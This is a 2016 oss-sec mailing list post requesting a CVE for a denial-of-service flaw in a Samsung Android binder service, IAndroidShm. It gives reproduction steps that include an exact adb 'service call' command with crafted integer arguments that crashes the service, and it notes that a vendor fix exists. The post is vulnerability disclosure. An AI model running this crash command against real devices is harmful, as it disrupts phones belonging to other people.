oss-sec mailing list archives
CVE request - Samsung Android phone com.samsung.android.jam.IAndroidShm binder service DoS
From: Vinc3nt4H <pengdawei521 () 163 com>
Date: Thu, 5 May 2016 21:07:29 +0800 (CST)
Hi,

Description of the potential vulnerability:
When an app sends evil data to the com.samsung.android.jam.IAndroidShm service via the service command (an Android system command), it can cause the IAndroidShm service to crash.

Steps to reproduce the issue:
1. A PC connects to the S6 device;
2. Input command: adb shell;
3. Android input command: service call com.samsung.android.jam.IAndroidShm 5 i32 917154658 i32 998369275 i32 1652062893 i32 2113420870 i32 1380178743 i32 47342718 i32 543810222 i32 1481030271

Affected versions: KK(4.4), L(5.0/5.1)

Fix: http://security.samsungmobile.com/smrupdate.html#SMR-JAN-2016
SVE-2015-5133: IAndroidShm IAPAService service DoS

We reported this to Samsung; Samsung replied that if we want a CVE, we should request it ourselves.

Best regards,
Vinc3nt4H of Alibaba Mobile Security Team